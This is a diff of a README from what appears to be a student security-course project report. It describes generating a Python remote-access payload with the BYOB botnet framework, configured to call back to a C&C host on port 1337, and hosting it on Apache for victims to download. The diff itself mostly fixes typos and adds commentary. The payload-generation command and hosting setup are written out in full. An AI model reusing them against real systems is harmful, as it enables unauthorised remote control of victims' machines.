d0n601/CSUS-CSC154/Project/midterm_report/README.md

 #### Python Payload

-A paylaod is generated via BYOB's `client.py` script.
-We've generated our linux payload by issuing `python client.py --name linux_payload --encrypt --compress --freeze sheep.casa 1337`.
+A payload is generated via BYOB's `client.py` script.
+We've generated our Linux payload by issuing `python client.py --name linux_payload --encrypt --compress --freeze sheep.casa 1337`.

 ![payload_generated](./images/payload_generated.png)
 **Figure 9:** Generating our python payload.

-In order to host our payloads, we've installed Apache 2.
+In order to host our payloads, we've installed Apache 2 on the C&C server.
+In a real world attack this would be pretty bad practice, but it's a matter of convenience for us.
 The payload generated above was moved from BYOB's directory to `/var/www/html/payloads`.
 This is where our victims will download the payload from.

 ![payload_directory](./images/payload_directory.png)
 **Figure 10:** `/payloads` directory hosting our malicious files.